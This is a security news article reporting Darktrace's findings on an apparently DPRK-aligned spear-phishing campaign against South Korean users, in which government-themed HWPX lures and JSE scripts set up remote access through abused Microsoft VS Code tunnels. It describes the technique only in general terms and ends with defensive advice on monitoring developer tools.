Cybersecurity researchers have uncovered a cyber-espionage campaign assessed to align with activity commonly associated with the Democratic People’s Republic of Korea (DPRK), targeting users in South Korea through carefully crafted spear-phishing emails.
The operation leverages JavaScript Encoded (JSE) scripts and realistic government-themed decoy documents to establish persistent remote access using Microsoft Visual Studio (VS) Code tunnels.
According to Darktrace analysts, the initial lure masquerades as a Hangul Word Processor (HWPX) document referencing a South Korean civil service graduate program. The document impersonates the Ministry of Personnel Management, a legitimate government body, and includes metadata suggesting it was copied from official sources and subtly altered to appear authentic.
When the file is opened, the JSE script executes via Windows Script Host and initiates a chain of activity that avoids traditional malware deployment. Instead of installing a custom backdoor, the script downloads legitimate Microsoft VS Code components and command-line utilities from trusted infrastructure, reducing the likelihood of triggering security alerts.
Abuse of Trusted Developer Features
From a technical standpoint, Microsoft VS Code tunnels are designed to let developers securely connect to remote systems over an encrypted channel after authenticating with a GitHub or Microsoft account.
In this campaign, the attackers create a tunnel in the background, generating a device authorization code that allows them to remotely access the compromised endpoint.
Once the tunnel is authorized, the threat actor gains interactive control through VS Code’s built-in terminal and file browser. This enables data exfiltration and delivery of additional payloads while blending into normal developer activity.
Darktrace observed that tunnel identifiers and authorization details were relayed through a compromised South Korean website used as part of the attackers’ command-and-control infrastructure.
The company noted that similar misuse of Microsoft VS Code tunnels has been observed since 2023 in campaigns attributed to other state-aligned threat groups targeting government and critical digital infrastructure.
“While definitive attribution cannot be made based on this sample alone, the alignment with established DPRK tactics, techniques, and procedures (TTPs) increases confidence that this activity originates from a DPRK state- aligned threat actor,” Darktrace wrote.
For security leaders, the research highlights the significance of behavioral monitoring and tighter governance over trusted administrative and developer tools that can be abused for long-term access.
